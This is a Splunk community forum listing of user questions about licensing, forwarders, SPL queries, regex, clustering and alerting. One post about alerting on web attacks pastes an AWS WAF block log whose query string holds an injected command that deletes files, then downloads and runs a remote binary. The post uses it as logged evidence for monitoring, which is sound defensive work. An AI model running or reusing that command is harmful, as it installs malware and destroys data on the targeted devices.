All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

We have Splunk Enterprise no enforcement license of 50Gb and we have two standalone indexer. I wanna know will that license of 50gb for each indexer or combine? according to me 50gb license would b... See more...
We have Splunk Enterprise no enforcement license of 50Gb and we have two standalone indexer. I wanna know will that license of 50gb for each indexer or combine? according to me 50gb license would be sum of each indexer utilization not individual 50gb.   Please clarify.
please can anyone help out with the below task any ideas will be fine.  Make sure all the Korea servers have UF installed and sending data to EY.   NET(deploymentclient.conf) validate if they are ... See more...
please can anyone help out with the below task any ideas will be fine.  Make sure all the Korea servers have UF installed and sending data to EY.   NET(deploymentclient.conf) validate if they are currently sending canvas application logs to splunk. validate log paths in the SR with the existing ones in canvas input apps (EYNET_Canvas*) add additional monitor stanzas to existing apps if needed. add servers to serverclass if they are not currently existing. Create deployment plan Raise a CHG request and submit for CAB review deploy during change window post validation of data              any Ideas ?  
Hi, can someone please help ? How to get the count or logs in gb/mb from particular sourcetype  on indexer?      
hi, My issue is I have a table like that : field 1 field 2  1 0 2 1 2 2 1 0   I want to create an third column that create the result of : first line = field1 - field2=fie... See more...
hi, My issue is I have a table like that : field 1 field 2  1 0 2 1 2 2 1 0   I want to create an third column that create the result of : first line = field1 - field2=field3 second line = first line field3 + second line field1 -  second line field2=new field3 third line = second line field3 + third line field1 -  third line field2=new field3 etc... field 1 field 2 field 3 1 0 1 2 1 2 (1+2-1) 1 2 1 (2+1-2) 1 0 2 (1+1-0)   Can you help me ?  Thanks!
What is the best way to post custom metrics to appdynamics. If we go with Machine Agent HTTP Listener, do we have any 3rd party library to use  Machine Agent HTTP Listener instead of directly calling... See more...
What is the best way to post custom metrics to appdynamics. If we go with Machine Agent HTTP Listener, do we have any 3rd party library to use  Machine Agent HTTP Listener instead of directly calling Rest APis. 
Hi We are moving from a single install to a cluster. The production machine is going to be used as a search head, can we delete the data on the search head that is now copied to another machine(new... See more...
Hi We are moving from a single install to a cluster. The production machine is going to be used as a search head, can we delete the data on the search head that is now copied to another machine(new indexer)? Is the below correct to delete for each index, so we keep the structure of the Indexer on the search head, but we remove the data as its just taking up space. /splunk/mlc_live/db /splunk/mlc_live/colddb /splunk/mlc_live/datamodel_summary Thanks in advance Rob
We have alerts setup which trigger an email when a specific device has triggered. This has been working great and provided good alerting based on threshold below.  The search is below: index=index1... See more...
We have alerts setup which trigger an email when a specific device has triggered. This has been working great and provided good alerting based on threshold below.  The search is below: index=index1 sourcetype="devices" earliest=-24h latest=now| stats avg(temp) as avg_temp by customer_id | where avg_temp < 15 However a customer wants reporting to show the individual customer/device and how many times it has alerted.Is there any way to report on this as the scheduler.log doesnt provide this granularity for say 3 months triggered alerts?  
I am new to splunk administration. may someone help with a query that gives both reporting and non-reporting devices in the last 1 hour and be able to show both on a pie-chart
Hello,   how to disable indexer discovery from indexers ? (Icmp pings to forwarders ?) Would Ihave to create an app to deploy on the indexer cluster which would contain file restmap.conf in local ... See more...
Hello,   how to disable indexer discovery from indexers ? (Icmp pings to forwarders ?) Would Ihave to create an app to deploy on the indexer cluster which would contain file restmap.conf in local folder with  stanza like this : [indexer_discovery:indexer_discovery] disabled=1     Or another Way to do ?   thank you for your help        
Can we take full backup of entire var directory on the Splunk indexer machine if we have enough available space?
Hello,  I added a file csv in splunk but the name is not correct for sourcetype. And i want to restart.  now :  source="test.csv" sourcetype="csv" I will want :  source="test.csv" sourcetype="te... See more...
Hello,  I added a file csv in splunk but the name is not correct for sourcetype. And i want to restart.  now :  source="test.csv" sourcetype="csv" I will want :  source="test.csv" sourcetype="test" If i do this query, it's correct ?  source="test.csv" sourcetype="csv" | delete  it will delete test.csv file please ?  thanks in advance.  Regards, Viat  
Hi,  Below are my logs: 2020-10-14 01:59:59,889 INFO [-912674] o.a.n.w.s.AuthenticationFilter Attempting request for (<ppatt2><CN=abcdefg50450.phx.xp.com, OU=Middleware Utilities, L=Phoenix, ST=Ari... See more...
Hi,  Below are my logs: 2020-10-14 01:59:59,889 INFO [-912674] o.a.n.w.s.AuthenticationFilter Attempting request for (<ppatt2><CN=abcdefg50450.phx.xp.com, OU=Middleware Utilities, L=Phoenix, ST=Arizona, C=US, SERIALNUMBER=188055, OID.1.3.6.1.4.1.311.60.2.1.2=New York, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization>) GET https://abcdefg50449.phx.xp.com:9091/api/flow/bulletin-board (source ) 2020-10-14 02:00:32,995 INFO 67995] o.a.n.w.s.NiFiAuthenticationFilter Attempting request for (<vkravic><CN=abcdefg50450.phx.xp.com, OU=Middleware Utilities,  L=Phoenix, ST=Arizona, C=US, SERIALNUMBER=188055, OID.1.3.6.1.4.1.311.60.2.1.2=New York, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization>) POST https://abcdefg50450.phx.xp.com:9091/api/flowfile-queues/5aab3ee9-4bd1-1f35-9756-ed1248dbc67a/listing-requests (source) I want two regex for two fields differently: One mark in red as Request User and one mark in green as Request Type. Can someone provide me regex's for both the fields. Thanks in advance.  
Requirement 1 : Eg : I have a correlation search which generates , 2000 events with in 24 hours with the same Title "Important- Password Expiration Notice". -- I shouldn't have 2000 notable events ... See more...
Requirement 1 : Eg : I have a correlation search which generates , 2000 events with in 24 hours with the same Title "Important- Password Expiration Notice". -- I shouldn't have 2000 notable events created in the Incident Review Dashboard. I should have only 1 notable event. -- If the Title is different , then a notable event should be created. I have tested updating Window duration as 24 hours and Fields to group by with "Title" field name , but it is working incorrectly. It is not generating a notable event , if the Title is different. Requirement 2 : Is there a way , I can update the existing notable event. Eg : Existing Notable event Title : Important- Password Expiration Notice         Existing Field value : abcuser@company.com         It should append the new value to existing field.            --abcuser@company.com            --xyzuser@compay.com
Hi, I'm trying to search for an example event of different types by field so that I can see the detail of different types of event. So if I do `| stats count by fieldname` and it returns 10 different... See more...
Hi, I'm trying to search for an example event of different types by field so that I can see the detail of different types of event. So if I do `| stats count by fieldname` and it returns 10 different values for that field, I can see 10 different events in the event view and look at the details of each value of the field. Make sense? Thanks
Hello, Integrated the AWS WAF logs to Splunk, now we need to monitor the Splunk SQL Injection and Cross-Site Script attacks in Splunk. Can any once please share the query on how to set the alerts f... See more...
Hello, Integrated the AWS WAF logs to Splunk, now we need to monitor the Splunk SQL Injection and Cross-Site Script attacks in Splunk. Can any once please share the query on how to set the alerts for SQL Injection and Cross-Site Script. Here are the Sample logs from AWS WAF logs which is from ALLOW and BLOCK action, and how to raise an incident if any one attack happen. action: ALLOW events: {"timestamp":1602659653929,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","terminatingRuleMatchDetails":[],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxx-PROD-ALB/06b9064d5ca45468","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"xx.xx.xxx.xx","country":"AU","headers":[{"name":"Host","value":"access.xxxxxx.com.in"},{"name":"Sec-WebSocket-Key","value":"LWyNMG9kCDp7z0UOSXpoUQ=="},{"name":"adSsoCookie","value":"O2bbUYoRhXfwrLaeD6j5mDLAG_s.*AAJTSQACMDIAAlNLABxueHBJaFYzYUVxQXg2VEdUS2Q4VllTVkQ2UzQ9AAR0eXBlAANDVFMAAlMxAAIwMQ..*"},{"name":"Sec-WebSocket-Version","value":"13"},{"name":"Sec-WebSocket-Protocol","value":"v1.notifications.xxxxxx.org"}],"uri":"/xxxxxxxx/notifications","args":"","httpVersion":"HTTP/1.1","httpMethod":"GET","requestId":"1-5f86a545-7e0faddd488b61a0746fe97d"}} action: BLOCK events: {"timestamp":1602647260818,"formatVersion":1,"webaclId":"ba8f2e58-8d58-42b6-a207-1d3e382db941","terminatingRuleId":"3afb3065-2ef7-41f9-9f29-972876893e09","terminatingRuleType":"REGULAR","action":"BLOCK","terminatingRuleMatchDetails":[{"conditionType":"SQL_INJECTION","location":"QUERY_STRING","matchedData":["next_file","/*;wget http://xxx.xx.xx.xxx:5"]}],"httpSourceName":"ALB","httpSourceId":"110604134217-app/xxxxxxx-PROD-ALB/06b9064d5ca45468","ruleGroupList":[],"rateBasedRuleList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"xxx.xx.xxx.xxx","country":"CN","headers":[{"name":"Host","value":"xxxxx-prod-alb-1083688078.ap-southeast-2.xxxxx.amazonaws.com"}],"uri":"/sxxxxxxxxxp.cgi","args":"next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://101.67.243.158:50647/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1","httpVersion":"HTTP/1.0","httpMethod":"GET","requestId":"1-5f8674dc-3a3d4032758b8da9064aeffb"}}
https://docs.splunk.com/Documentation/Splunk/8.0.6/Indexer/MultisiteSmartStore This document says: "This deployment type is limited to two sites, with each site hosted in an on-premises data center"... See more...
https://docs.splunk.com/Documentation/Splunk/8.0.6/Indexer/MultisiteSmartStore This document says: "This deployment type is limited to two sites, with each site hosted in an on-premises data center" Why is more than 2 sites not supported for Smartstore? Is it a Splunk's architectural limitation?
Hello, I develop my own Splunk App for specific file.  These files are archive files with the ".tar.gz" extension and the filename end with "myapp". I make my own props.conf in my App :  [preproces... See more...
Hello, I develop my own Splunk App for specific file.  These files are archive files with the ".tar.gz" extension and the filename end with "myapp". I make my own props.conf in my App :  [preprocess-myapparchive] invalid_cause = archive is_valid = False LEARN_MODEL = false [source::...myapp.tar.gz] unarchive_cmd = /opt/splunk/etc/apps/myapp/bin/myapp.py NO_BINARY_CKECK = true sourcetype = preprocess-myapparchive priority = 10002   It seems like my [source::...myapp.tar.gz] stanza is never called because Splunk catch the file as .tar.gz and try to uncompress the archive file. How i can bypass the splunk system configuration for .tar.gz files ?  My problem is relative to this post : https://community.splunk.com/t5/Getting-Data-In/ArchiveProcessor-Bypassing-normal-system-local-props-conf/m-p/78002#M15965 but the answer provided is not correct with my needs as I can't modify the /system/local/props.conf file...
I have a simple dashboard table where one of the columns is a download link. Is there a way to edit just the xml file of the dashboard and change the color of the text to blue in that column and also... See more...
I have a simple dashboard table where one of the columns is a download link. Is there a way to edit just the xml file of the dashboard and change the color of the text to blue in that column and also underline the same so that it appears like a downloadable link.  Thanks in advance
Dear Team, I have cloudflare app setup and index has data. However, when i open the app from the menu, it show zero result. This is the search of one query: | tstats count from datamodel=cloudflare... See more...
Dear Team, I have cloudflare app setup and index has data. However, when i open the app from the menu, it show zero result. This is the search of one query: | tstats count from datamodel=cloudflare.cloudflare where Cloudflare.ClientCountry="*" Cloudflare.ClientDeviceType="*" Cloudflare.dest_ip="*" Cloudflare.dest_host="*" Cloudflare.uri_path="*" Cloudflare.http_user_agent="*" Cloudflare.status="*" Cloudflare.src_ip="" Cloudflare.OriginResponseStatus="200" Cloudflare.RayID="*" Cloudflare.WorkerSubrequest="*" Cloudflare.http_method="*" --> the result is 0. However, when i omit the rest and leave ony clientcountry field. I have data. I have my data model created and finished acceleration. What is the cause of that?
Hello I have this query:   "| tstats `summariesonly` values(Authentication.app) as app,count from datamodel=Authentication.Authentication where earliest=-1d by Authentication.action,Authenticatio... See more...
Hello I have this query:   "| tstats `summariesonly` values(Authentication.app) as app,count from datamodel=Authentication.Authentication where earliest=-1d by Authentication.action,Authentication.src,index | `drop_dm_object_name(\"Authentication\")` | eval success=if(action=\"success\",count,0),failure=if(action=\"failure\",count,0) | stats values(app) as app,sum(failure) as failure,sum(success) as success by src,index | where success > 0 | `mltk_apply_upper(\"app:failures_by_src_count_1d\", \"medium\", \"failure\")` | table userPrincipalName, state"     1. I need to add user to the query but I didnt find user field on this datamodel  (used this stats dc() as * | transpose) How can I find all the fields there ?  2. Also, shows app list + number of failures + number of successes, but but no correlation of failures/successes to apps, how can I add this?   3. How can I add failure reason ?   thanks!